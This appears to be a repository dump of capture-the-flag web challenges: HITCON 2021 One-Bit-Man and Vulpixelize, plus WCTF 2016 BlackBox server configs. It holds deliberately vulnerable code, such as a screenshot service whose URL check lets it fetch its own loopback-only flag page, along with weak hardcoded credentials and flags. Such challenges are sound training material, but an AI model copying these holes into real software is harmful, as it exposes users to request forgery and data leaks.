's@{BASE}@'"$CTF_BASE"'@g' /init.sql 35 | mysql -uroot -proot < /init.sql 36 | 37 | # web 38 | htpasswd -cb /etc/apache2/.htpasswd ctf "$CTF_PASSWD" 39 | 40 | # flip the bit with some 
dirty hacks... 41 | sed -i 's/exec "$@"//' /usr/local/bin/docker-entrypoint.sh 42 | cat << EOF >> /usr/local/bin/docker-entrypoint.sh 43 | 44 | result=\$(php /hack.php "\$CTF_FILENAME" "\$CTF_POSITION" "\$CTF_BITPOS") 45 | if [[ "\$result" != "all good" ]]; then 46 | echo \$result 47 | exit -1 48 | fi 49 | 50 | exec "\$@" 51 | EOF 52 | 53 | # original command 54 | timeout -s 9 900 docker-entrypoint.sh apache2-foreground -------------------------------------------------------------------------------- /hitcon-ctf-2021/One-Bit-Man/files/fake-flag: -------------------------------------------------------------------------------- 1 | hitcon{this-is-fake-flag} 2 | -------------------------------------------------------------------------------- /hitcon-ctf-2021/One-Bit-Man/files/flag: -------------------------------------------------------------------------------- 1 | hitcon{if your solution is l33t, please share it!} 2 | -------------------------------------------------------------------------------- /hitcon-ctf-2021/One-Bit-Man/files/hack.php: -------------------------------------------------------------------------------- 1 | 7) 19 | die('bit error'); 20 | 21 | $content = file_get_contents($filename); 22 | 23 | $head = substr($content, 0, $position); 24 | $byte = substr($content, $position, 1); 25 | $tail = substr($content, $position + 1); 26 | 27 | $byte = chr( ord($byte) ^ (1<<$bit_pos) ); 28 | 29 | file_put_contents($filename, $head . $byte . 
$tail); 30 | echo 'all good'; -------------------------------------------------------------------------------- /hitcon-ctf-2021/One-Bit-Man/files/htaccess: -------------------------------------------------------------------------------- 1 | AuthType Basic 2 | AuthName CTF 3 | AuthUserFile /etc/apache2/.htpasswd 4 | Require valid-user -------------------------------------------------------------------------------- /hitcon-ctf-2021/One-Bit-Man/files/readflag: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/One-Bit-Man/files/readflag -------------------------------------------------------------------------------- /hitcon-ctf-2021/One-Bit-Man/files/readflag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | // gcc -static -o readflag ./readflag.c 4 | int main(){ 5 | char s[1024] = {0}; 6 | FILE *fp = fopen("/flag", "rb"); 7 | fread(&s, 1, 1024, fp); 8 | printf("%s", s); 9 | } 10 | 11 | -------------------------------------------------------------------------------- /hitcon-ctf-2021/One-Bit-Man/static/one-bit-man.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/One-Bit-Man/static/one-bit-man.tgz -------------------------------------------------------------------------------- /hitcon-ctf-2021/One-Bit-Man/wordpress.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/One-Bit-Man/wordpress.tgz -------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/Dockerfile: 
--------------------------------------------------------------------------------
FROM selenium/standalone-chrome
MAINTAINER orange@chroot.org

EXPOSE 8000/tcp

USER root

RUN apt update && apt install --no-install-recommends -y python3-pip
# NOTE(review): flask is listed twice, and flask-limiter is installed but never
# imported by app.py -- there is no rate limit in the app itself.
RUN pip3 install selenium flask pillow flask flask-limiter

COPY app/ /app
COPY files/secret /secret
COPY files/read_secret /read_secret
COPY files/entrypoint.sh /

WORKDIR /app/
CMD ["/entrypoint.sh"]
-------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/Makefile: --------------------------------------------------------------------------------
compile:
	gcc -o files/read_secret files/read_secret.c

build: compile clean
	docker build -t vulpixelize . --no-cache

test:
	docker run --rm -p 12345:8000 --name test --log-driver="syslog" --env CTF_PASSWD=ctf -ti vulpixelize

# Player handout: real secret and read_secret.c excluded, fake-secret renamed
# to secret inside the archive.
pack: compile
	rm -rf static/vulpixelize.tgz
	tar --exclude='secret' --exclude='read_secret.c' --transform='flags=r;s|fake-secret|secret|' -zcvf static/vulpixelize.tgz Dockerfile app/ files/

# Must agree with the FLAG derivation in app.py (md5 of the secret bytes,
# hex digest joined with '-').
flag:
	python3 -c 's=__import__("hashlib").md5(open("files/secret").read().encode()).hexdigest();print("hitcon{" + "-".join(list(s)) + "}")'

run: pack
	python3 run.py 2>&1 | tee -a logs/log.txt

clean:
	-docker rm -f `docker ps -a -q`
	-docker rmi -f `docker images -a -q`
-------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/app/app.py: --------------------------------------------------------------------------------
# coding: UTF-8
# Vulpixelize: takes a URL, screenshots it with a headless Chrome running in
# this same container, pixelates the screenshot and returns the saved image.
import io, os, sys, uuid

from subprocess import run, PIPE
from hashlib import md5

from PIL import Image
from selenium import webdriver, common
from flask import Flask, render_template, request

# The secret is read once at import through the setuid helper (/read_secret is
# chmod +s and /secret is 0400 per entrypoint.sh), so the app process -- which
# runs as seluser -- holds FLAG in memory for its whole lifetime.
secret = run(['/read_secret'], stdout=PIPE).stdout
FLAG = 'hitcon{%s}' % '-'.join(md5(secret).hexdigest())
def init_chrome():
    """Start one headless Chrome driver: 1920x1080 window, 5 s page-load and
    script timeouts, downloads disabled by pointing them at /dev/null.

    Called once at import; the returned driver is shared by every request.
    """
    options = webdriver.ChromeOptions()
    options.add_argument('--headless')
    options.add_argument('--disable-gpu')
    options.add_argument('--disable-dev-shm-usage')
    options.add_argument('--window-size=1920x1080')
    options.add_experimental_option("prefs", {
        'download.prompt_for_download': True,
        'download.default_directory': '/dev/null'
    })

    driver = webdriver.Chrome(options=options)
    driver.set_page_load_timeout(5)
    driver.set_script_timeout(5)

    return driver

def message(msg):
    """Render index.html with msg (a saved image path or an error string)."""
    return render_template('index.html', msg=msg)

### initialize ###
# One driver for the whole process. NOTE(review): submit() drives it without a
# lock; if requests are handled concurrently (Flask's dev server is threaded by
# default in recent releases -- confirm for the installed version) two submits
# can interleave get()/screenshot and one caller receives another's page.
driver = init_chrome()
app = Flask(__name__)
### initialize ###


@app.route('/flag')
def flag():
    """Return FLAG only when the TCP peer is loopback.

    remote_addr is the socket peer (no ProxyFix is configured), so it cannot be
    spoofed via X-Forwarded-For. It *is* satisfied by the Chrome instance
    started above, which runs inside this container: a /submit request whose
    url points at this service's own /flag on 127.0.0.1 is fetched from
    loopback and has the flag rendered into the screenshot -- the 64x64
    downscale in submit() is what is meant to make that text unreadable.
    """
    if request.remote_addr == '127.0.0.1':
        return message(FLAG)
    return message("allow only from local")

@app.route('/', methods=['GET'])
def index():
    return render_template('index.html')

@app.route('/submit', methods=['GET'])
def submit():
    """Screenshot `url` with the shared driver, pixelate it (1920x1080 -> 64x64
    bilinear -> 1920x1080 nearest) and return the saved path.

    Only the scheme prefix is checked; the host is unrestricted, so the browser
    will load anything reachable from the container, including this service
    (see flag()). The output name is a random uuid4, so results are not
    enumerable. A WebDriverException (timeouts included) returns its text to
    the caller.
    """
    path = 'static/images/%s.png' % uuid.uuid4().hex
    url = request.args.get('url')
    if url:
        # security check: scheme prefix only, no host allow-list
        if not url.startswith('http://') and not url.startswith('https://'):
            return message(msg='malformed url')

        # access url
        try:
            driver.get(url)
            data = driver.get_screenshot_as_png()
        except common.exceptions.WebDriverException as e:
            return message(msg=str(e))

        # save result: the 64x64 intermediate is the deliberate information
        # loss before scaling back up
        img = Image.open(io.BytesIO(data))
        img = img.resize((64,64), resample=Image.BILINEAR)
        img = img.resize((1920,1080), Image.NEAREST)
        img.save(path)

        return message(msg=path)
    else:
        return message(msg="url not found :(")

if __name__ == '__main__':
    app.run('0.0.0.0', 8000)
-------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/app/static/bg.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Vulpixelize/app/static/bg.jpg -------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/app/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | Vulpixelize 5 | 6 | 7 | 8 | 9 | 39 | 40 | 41 |42 |76 | 77 | -------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/files/entrypoint.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # perm 4 | chown root.root /*secret 5 | chmod 400 /secret 6 | chmod 111 /read_secret 7 | chmod +s /read_secret 8 | chown seluser.seluser /app/static/images/ 9 | 10 | 11 | # run 12 | timeout -s 9 900 su -s /bin/bash seluser -c 'python3 /app/app.py' -------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/files/fake-secret: -------------------------------------------------------------------------------- 1 | this-is-fake-secret -------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/files/read_secret: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Vulpixelize/files/read_secret -------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/files/read_secret.c: -------------------------------------------------------------------------------- 1 | #include
43 |
44 |45 |47 | 48 |Vulpixelize
46 |
49 |50 |63 | 64 |51 | 61 |62 |
65 |
66 |67 | 68 | {% if msg and msg.startswith('static') %} 69 | Your Vulpix 70 | {% else %} 71 | {{ msg }} 72 | {% endif %} 73 | 74 |75 |2 | 3 | // gcc -static -o read_secret ./read_secret.c 4 | int main(){ 5 | char s[1024] = {0}; 6 | FILE *fp = fopen("/secret", "rb"); 7 | fread(&s, 1, 1024, fp); 8 | printf("%s", s); 9 | } 10 | 11 | -------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/files/secret: -------------------------------------------------------------------------------- 1 | ohmygod you are awesome!!!!!!!!!!!!!!!! https://youtu.be/Q5aoackIasE -------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/run.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | import os, sys 4 | import uuid 5 | from random import shuffle 6 | from subprocess import run, PIPE 7 | 8 | from flask import Flask, request, make_response 9 | from redis import Redis 10 | 11 | ''' 12 | pip install redis 13 | apt install redis-server 14 | ''' 15 | 16 | PUBLIC_ADDRESS = '3.113.172.41' 17 | AVAILABLE_PORTS = list(range(20000, 40000)) 18 | shuffle(AVAILABLE_PORTS) 19 | 20 | INDEX = ''' 21 | Your Vulpixelize is launched! 22 | 23 | Exec Command:
> {CMD} 24 |Exec Result:
> {RES} 25 | ''' 26 | 27 | 28 | app = Flask(__name__) 29 | conn = Redis(host='127.0.0.1', password='') 30 | 31 | def my_exec(cmds): 32 | return run(cmds, stdout=PIPE, stderr=PIPE) 33 | 34 | def response(msg): 35 | msg = "\n" + msg 36 | return msg 37 | 38 | @app.route('/') 39 | def index(): 40 | msg = '' 41 | msg += 'Download Dockerfile
\n' 42 | msg += '
\n' 45 | msg += 'P.S. We limit the docker-lanching rate (once per minute) by your I P address.' 46 | return msg 47 | 48 | @app.route('/', methods=['POST']) 49 | def submit(): 50 | key = 'lock_%s' % request.remote_addr 51 | # if conn.get(key): 52 | # return response('too quick... %d second remaining' % conn.ttl(key)) 53 | # else: 54 | # conn.setex(key, 60, 'ok') 55 | 56 | port = AVAILABLE_PORTS.pop() 57 | name = 'team-%s' % uuid.uuid4().hex[:16] 58 | 59 | launch_cmd = [ 60 | 'docker', 'run', '--rm', 61 | '-p', '%d:8000' % port, 62 | '--name', name, 63 | '--log-driver=syslog', 64 | '-itd', 'vulpixelize' 65 | ] 66 | p = my_exec(launch_cmd) 67 | result = p.stdout.decode() 68 | if p.stderr: 69 | result = p.stderr.decode() 70 | 71 | msg = INDEX.strip() 72 | msg = msg.replace('{BASE}', 'http://%s:%d/' % (PUBLIC_ADDRESS, port)) 73 | msg = msg.replace('{CMD}', ' '.join(launch_cmd)) 74 | msg = msg.replace('{RES}', result) 75 | return response(msg) 76 | 77 | if __name__ == '__main__': 78 | print('Listening on http://%s:%d/' % (PUBLIC_ADDRESS, 80)) 79 | app.run('0.0.0.0', 80) 80 | -------------------------------------------------------------------------------- /hitcon-ctf-2021/Vulpixelize/static/vulpixelize.tgz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/hitcon-ctf-2021/Vulpixelize/static/vulpixelize.tgz -------------------------------------------------------------------------------- /hitcon-ctf-2021/W3rmup-PHP/index.php: -------------------------------------------------------------------------------- 1 | 9 | # AllowOverride None 10 | # Require all denied 11 | # 12 | 13 | 14 | # Changing the following options will not really affect the security of the 15 | # server, but might make attacks slightly more difficult in some cases. 
16 | 17 | # 18 | # ServerTokens 19 | # This directive configures what you return as the Server HTTP response 20 | # Header. The default is 'Full' which sends information about the OS-Type 21 | # and compiled in modules. 22 | # Set to one of: Full | OS | Minimal | Minor | Major | Prod 23 | # where Full conveys the most information, and Prod the least. 24 | #ServerTokens Minimal 25 | ServerTokens OS 26 | #ServerTokens Full 27 | 28 | # 29 | # Optionally add a line containing the server version and virtual host 30 | # name to server-generated pages (internal error documents, FTP directory 31 | # listings, mod_status and mod_info output etc., but not CGI generated 32 | # documents or custom error documents). 33 | # Set to "EMail" to also include a mailto: link to the ServerAdmin. 34 | # Set to one of: On | Off | EMail 35 | #ServerSignature Off 36 | ServerSignature On 37 | 38 | # 39 | # Allow TRACE method 40 | # 41 | # Set to "extended" to also reflect the request body (only for testing and 42 | # diagnostic purposes). 43 | # 44 | # Set to one of: On | Off | extended 45 | TraceEnable Off 46 | #TraceEnable On 47 | 48 | # 49 | # Forbid access to version control directories 50 | # 51 | # If you use version control systems in your document root, you should 52 | # probably deny access to their directories. For example, for subversion: 53 | # 54 | #55 | # Require all denied 56 | # 57 | 58 | # 59 | # Setting this header will prevent MSIE from interpreting files as something 60 | # else than declared by the content type in the HTTP headers. 61 | # Requires mod_headers to be enabled. 62 | # 63 | #Header set X-Content-Type-Options: "nosniff" 64 | 65 | # 66 | # Setting this header will prevent other sites from embedding pages from this 67 | # site as frames. This defends against clickjacking attacks. 68 | # Requires mod_headers to be enabled. 
69 | # 70 | #Header set X-Frame-Options: "sameorigin" 71 | 72 | 73 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 74 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/apache2/conf-enabled/serve-cgi-bin.conf: -------------------------------------------------------------------------------- 1 |2 | 19 | 20 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 21 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/apache2/envvars: -------------------------------------------------------------------------------- 1 | # envvars - default environment variables for apache2ctl 2 | 3 | # this won't be correct after changing uid 4 | unset HOME 5 | 6 | # for supporting multiple apache2 instances 7 | if [ "${APACHE_CONFDIR##/etc/apache2-}" != "${APACHE_CONFDIR}" ] ; then 8 | SUFFIX="-${APACHE_CONFDIR##/etc/apache2-}" 9 | else 10 | SUFFIX= 11 | fi 12 | 13 | # Since there is no sane way to get the parsed apache2 config in scripts, some 14 | # settings are defined via environment variables and then used in apache2ctl, 15 | # /etc/init.d/apache2, /etc/logrotate.d/apache2, etc. 16 | export APACHE_RUN_USER=www-data 17 | export APACHE_RUN_GROUP=www-data 18 | # temporary state file location. This might be changed to /run in Wheezy+1 19 | export APACHE_PID_FILE=/var/run/apache2/apache2$SUFFIX.pid 20 | export APACHE_RUN_DIR=/var/run/apache2$SUFFIX 21 | export APACHE_LOCK_DIR=/var/lock/apache2$SUFFIX 22 | # Only /var/log/apache2 is handled by /etc/logrotate.d/apache2. 23 | export APACHE_LOG_DIR=/var/log/apache2$SUFFIX 24 | 25 | ## The locale used by some modules like mod_dav 26 | export LANG=C 27 | ## Uncomment the following line to use the system default locale instead: 28 | #. /etc/default/locale 29 | 30 | export LANG 31 | 32 | ## The command to get the status for 'apache2ctl status'. 33 | ## Some packages providing 'www-browser' need '--dump' instead of '-dump'. 
34 | #export APACHE_LYNX='www-browser -dump' 35 | 36 | ## If you need a higher file descriptor limit, uncomment and adjust the 37 | ## following line (default is 8192): 38 | #APACHE_ULIMIT_MAX_FILES='ulimit -n 65536' 39 | 40 | ## If you would like to pass arguments to the web server, add them below 41 | ## to the APACHE_ARGUMENTS environment. 42 | #export APACHE_ARGUMENTS='' 43 | 44 | ## Enable the debug mode for maintainer scripts. 45 | ## This will produce a verbose output on package installations of web server modules and web application 46 | ## installations which interact with Apache 47 | #export APACHE2_MAINTSCRIPT_DEBUG=1 48 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/apache2/mods-enabled/jk.load: -------------------------------------------------------------------------------- 1 | LoadModule jk_module /usr/lib/apache2/modules/mod_jk.so 2 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/apache2/mods-enabled/php7.0.conf: -------------------------------------------------------------------------------- 1 |3 | Define ENABLE_USR_LIB_CGI_BIN 4 | 5 | 6 |7 | Define ENABLE_USR_LIB_CGI_BIN 8 | 9 | 10 |11 | ScriptAlias /cgi-bin/ /usr/lib/cgi-bin/ 12 | 18 |13 | AllowOverride None 14 | Options +ExecCGI -MultiViews +SymLinksIfOwnerMatch 15 | Require all granted 16 | 17 |2 | SetHandler application/x-httpd-php 3 | 4 |5 | SetHandler application/x-httpd-php-source 6 | # Deny access to raw php sources by default 7 | # To re-enable it's recommended to enable access to the files 8 | # only in specific virtual host or directory 9 | Require all denied 10 | 11 | # Deny access to files without filename (e.g. '.php') 12 |13 | Require all denied 14 | 15 | 16 | # Running PHP scripts in user directories is disabled by default 17 | # 18 | # To re-enable PHP in user directories comment the following lines 19 | # (fromto .) 
Do NOT set it to On as it 20 | # prevents .htaccess files from disabling it. 21 |22 | 26 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/apache2/mods-enabled/php7.0.load: -------------------------------------------------------------------------------- 1 | # Conflicts: php5 2 | LoadModule php7_module /usr/lib/apache2/modules/libphp7.0.so 3 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/apache2/ports.conf: -------------------------------------------------------------------------------- 1 | # If you just change the port or add more ports here, you will likely also 2 | # have to change the VirtualHost statement in 3 | # /etc/apache2/sites-enabled/000-default.conf 4 | 5 | Listen 80 6 | 7 |23 | php_admin_flag engine Off 24 | 25 |8 | Listen 443 9 | 10 | 11 |12 | Listen 443 13 | 14 | 15 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 16 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/apache2/sites-enabled/000-default.conf: -------------------------------------------------------------------------------- 1 |2 | 3 | ServerAdmin webmaster@localhost 4 | DocumentRoot /www 5 | 6 | 7 | ErrorLog ${APACHE_LOG_DIR}/error.log 8 | CustomLog ${APACHE_LOG_DIR}/access.log combined 9 | 10 | 18 | 19 | # vim: syntax=apache ts=4 sw=4 sts=4 sr noet 20 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/etc/crontab: -------------------------------------------------------------------------------- 1 | # /etc/crontab: system-wide crontab 2 | # Unlike any other crontab you don't have to run the `crontab' 3 | # command to install the new version when you edit this file 4 | # and files in /etc/cron.d. These files also have username fields, 5 | # that none of the other crontabs do. 
6 | 7 | SHELL=/bin/sh 8 | PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin 9 | 10 | # m h dom mon dow user command 11 | 17 * * * * root cd / && run-parts --report /etc/cron.hourly 12 | 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily ) 13 | 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly ) 14 | 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly ) 15 | 16 | 17 | */10 * * * * root find /www/write_shell_here_\=P -type f -delete 18 | */5 * * * * root rm /www/*.tgz; cp /root/www_backup_for_poc_ctf_and_you_cant_guess_it.tgz /www/www_backup_for_poc_ctf_and_you_cant_guess_it_$(openssl rand -hex 8).tgz 19 | # 20 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/h2/bin/h2-1.4.191.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/h2/bin/h2-1.4.191.jar -------------------------------------------------------------------------------- /wctf-2016/BlackBox/h2/bin/h2-shell.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | if [ -z "$H2_HOME" ]; then 4 | echo "H2_HOME is not set" 5 | echo "Set H2_HOME environment variable: export H2_HOME=/path/to/h2" 6 | exit 1 7 | fi 8 | 9 | URL=$1 10 | USER=$2 11 | PASSWORD=$3 12 | 13 | if [ -z "$URL" ]; then 14 | echo "URL is not set" 15 | echo "Usage: h2-shell.sh URL USER PASSWORD" 16 | exit 1 17 | fi 18 | 19 | if [ -z "$USER" ]; then 20 | echo "USER is not set" 21 | echo "Usage: h2-shell.sh URL USER PASSWORD" 22 | exit 1 23 | fi 24 | 25 | if [ -z "$PASSWORD" ]; then 26 | echo "PASSWORD is not set" 27 | echo "Usage: h2-shell.sh URL USER PASSWORD" 28 | exit 1 29 | fi 30 | 31 | java -cp $H2_HOME/bin/h2*.jar org.h2.tools.Shell -url $URL -user 
$USER -password $PASSWORD 32 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/h2/bin/h2.pid: -------------------------------------------------------------------------------- 1 | 26109 2 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/h2/db/news.mv.db: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/h2/db/news.mv.db -------------------------------------------------------------------------------- /wctf-2016/BlackBox/login.war: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/orangetw/My-CTF-Web-Challenges/325ab4e4b4888a7ca73092b8f9e4af70844a09e9/wctf-2016/BlackBox/login.war -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/conf/Catalina/localhost/manager.xml: -------------------------------------------------------------------------------- 1 | 2 | 18 |11 | Require all granted 12 | 13 | 14 | JkMount /login/* ajp13_worker 15 | JkMount /login ajp13_worker 16 | 17 |21 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/conf/context.xml: -------------------------------------------------------------------------------- 1 | 2 | 18 | 19 | 20 | 21 | 22 | 23 | 37 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/conf/logging.properties: -------------------------------------------------------------------------------- 1 | # Licensed to the Apache Software Foundation (ASF) under one or more 2 | # contributor license agreements. See the NOTICE file distributed with 3 | # this work for additional information regarding copyright ownership. 
4 | # The ASF licenses this file to You under the Apache License, Version 2.0 5 | # (the "License"); you may not use this file except in compliance with 6 | # the License. You may obtain a copy of the License at 7 | # 8 | # http://www.apache.org/licenses/LICENSE-2.0 9 | # 10 | # Unless required by applicable law or agreed to in writing, software 11 | # distributed under the License is distributed on an "AS IS" BASIS, 12 | # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | # See the License for the specific language governing permissions and 14 | # limitations under the License. 15 | 16 | handlers = 1catalina.org.apache.juli.FileHandler, 2localhost.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler 17 | 18 | .handlers = 1catalina.org.apache.juli.FileHandler, java.util.logging.ConsoleHandler 19 | 20 | ############################################################ 21 | # Handler specific properties. 22 | # Describes specific configuration info for Handlers. 23 | ############################################################ 24 | 25 | 1catalina.org.apache.juli.FileHandler.level = FINE 26 | 1catalina.org.apache.juli.FileHandler.directory = ${catalina.base}/logs 27 | 1catalina.org.apache.juli.FileHandler.prefix = catalina. 28 | 29 | 2localhost.org.apache.juli.FileHandler.level = FINE 30 | 2localhost.org.apache.juli.FileHandler.directory = ${catalina.base}/logs 31 | 2localhost.org.apache.juli.FileHandler.prefix = localhost. 32 | 33 | java.util.logging.ConsoleHandler.level = FINE 34 | java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter 35 | 36 | ############################################################ 37 | # Facility specific properties. 38 | # Provides extra control for each logger. 
39 | ############################################################ 40 | 41 | org.apache.catalina.core.ContainerBase.[Catalina].[localhost].level = INFO 42 | org.apache.catalina.core.ContainerBase.[Catalina].[localhost].handlers = 2localhost.org.apache.juli.FileHandler 43 | 44 | # For example, set the com.xyz.foo logger to only log SEVERE 45 | # messages: 46 | #org.apache.catalina.startup.ContextConfig.level = FINE 47 | #org.apache.catalina.startup.HostConfig.level = FINE 48 | #org.apache.catalina.session.ManagerBase.level = FINE 49 | #org.apache.catalina.core.AprLifecycleListener.level=FINE 50 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/conf/policy.d/01system.policy: -------------------------------------------------------------------------------- 1 | // Licensed to the Apache Software Foundation (ASF) under one or more 2 | // contributor license agreements. See the NOTICE file distributed with 3 | // this work for additional information regarding copyright ownership. 4 | // The ASF licenses this file to You under the Apache License, Version 2.0 5 | // (the "License"); you may not use this file except in compliance with 6 | // the License. You may obtain a copy of the License at 7 | // 8 | // http://www.apache.org/licenses/LICENSE-2.0 9 | // 10 | // Unless required by applicable law or agreed to in writing, software 11 | // distributed under the License is distributed on an "AS IS" BASIS, 12 | // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | // See the License for the specific language governing permissions and 14 | // limitations under the License. 15 | 16 | // ============================================================================ 17 | // catalina.corepolicy - Security Policy Permissions for Tomcat 8 18 | // 19 | // This file contains a default set of security policies to be enforced (by the 20 | // JVM) when Catalina is executed with the "-security" option. 
In addition 21 | // to the permissions granted here, the following additional permissions are 22 | // granted to the codebase specific to each web application: 23 | // 24 | // * Read access to the document root directory 25 | // 26 | // $Id: catalina.policy 609294 2008-01-06 11:43:46Z markt $ 27 | // ============================================================================ 28 | 29 | 30 | // ========== SYSTEM CODE PERMISSIONS ========================================= 31 | 32 | 33 | // These permissions apply to javac 34 | grant codeBase "file:${java.home}/lib/-" { 35 | permission java.security.AllPermission; 36 | }; 37 | 38 | // These permissions apply to all shared system extensions 39 | grant codeBase "file:${java.home}/jre/lib/ext/-" { 40 | permission java.security.AllPermission; 41 | }; 42 | 43 | // These permissions apply to javac when ${java.home] points at $JAVA_HOME/jre 44 | grant codeBase "file:${java.home}/../lib/-" { 45 | permission java.security.AllPermission; 46 | }; 47 | 48 | // These permissions apply to all shared system extensions when 49 | // ${java.home} points at $JAVA_HOME/jre 50 | grant codeBase "file:${java.home}/lib/ext/-" { 51 | permission java.security.AllPermission; 52 | }; 53 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/conf/policy.d/02debian.policy: -------------------------------------------------------------------------------- 1 | // These permissions apply to all JARs from Debian packages 2 | grant codeBase "file:/usr/share/java/-" { 3 | permission java.security.AllPermission; 4 | }; 5 | grant codeBase "file:/usr/share/maven-repo/-" { 6 | permission java.security.AllPermission; 7 | }; 8 | grant codeBase "file:/usr/share/ant/lib/-" { 9 | permission java.security.AllPermission; 10 | }; 11 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/conf/policy.d/03catalina.policy: 
-------------------------------------------------------------------------------- 1 | // ========== CATALINA CODE PERMISSIONS ======================================= 2 | 3 | 4 | // These permissions apply to the logging API 5 | grant codeBase "file:${catalina.home}/bin/tomcat-juli.jar" { 6 | permission java.util.PropertyPermission "java.util.logging.config.class", "read"; 7 | permission java.util.PropertyPermission "java.util.logging.config.file", "read"; 8 | permission java.lang.RuntimePermission "shutdownHooks"; 9 | permission java.io.FilePermission "${catalina.base}${file.separator}conf${file.separator}logging.properties", "read"; 10 | permission java.util.PropertyPermission "catalina.base", "read"; 11 | permission java.util.logging.LoggingPermission "control"; 12 | permission java.io.FilePermission "${catalina.base}${file.separator}logs", "read, write"; 13 | permission java.io.FilePermission "${catalina.base}${file.separator}logs${file.separator}*", "read, write"; 14 | permission java.lang.RuntimePermission "getClassLoader"; 15 | permission java.lang.RuntimePermission "setContextClassLoader"; 16 | // To enable per context logging configuration, permit read access to the appropriate file. 
17 | // Be sure that the logging configuration is secure before enabling such access 18 | // eg for the examples web application: 19 | // permission java.io.FilePermission "${catalina.base}${file.separator}webapps${file.separator}examples${file.separator}WEB-INF${file.separator}classes${file.separator}logging.properties", "read"; 20 | }; 21 | 22 | // These permissions apply to the server startup code 23 | grant codeBase "file:${catalina.home}/bin/bootstrap.jar" { 24 | permission java.security.AllPermission; 25 | }; 26 | 27 | // These permissions apply to the servlet API classes 28 | // and those that are shared across all class loaders 29 | // located in the "lib" directory 30 | grant codeBase "file:${catalina.home}/lib/-" { 31 | permission java.security.AllPermission; 32 | }; 33 | -------------------------------------------------------------------------------- /wctf-2016/BlackBox/tomcat8/conf/policy.d/50local.policy: -------------------------------------------------------------------------------- 1 | // You can assign additional permissions to particular web applications by 2 | // adding additional "grant" entries here, based on the code base for that 3 | // application, /WEB-INF/classes/, or /WEB-INF/lib/ jar files. 4 | // 5 | // Different permissions can be granted to JSP pages, classes loaded from 6 | // the /WEB-INF/classes/ directory, all jar files in the /WEB-INF/lib/ 7 | // directory, or even to individual jar files in the /WEB-INF/lib/ directory. 8 | // 9 | // For instance, assume that the standard "examples" application 10 | // included a JDBC driver that needed to establish a network connection to the 11 | // corresponding database and used the scrape taglib to get the weather from 12 | // the NOAA web server. You might create a "grant" entries like this: 13 | // 14 | // The permissions granted to the context root directory apply to JSP pages. 
